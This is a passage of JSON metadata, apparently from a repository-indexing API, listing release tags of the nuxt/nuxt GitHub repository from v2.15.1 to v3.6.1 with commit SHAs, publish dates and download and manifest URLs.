parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.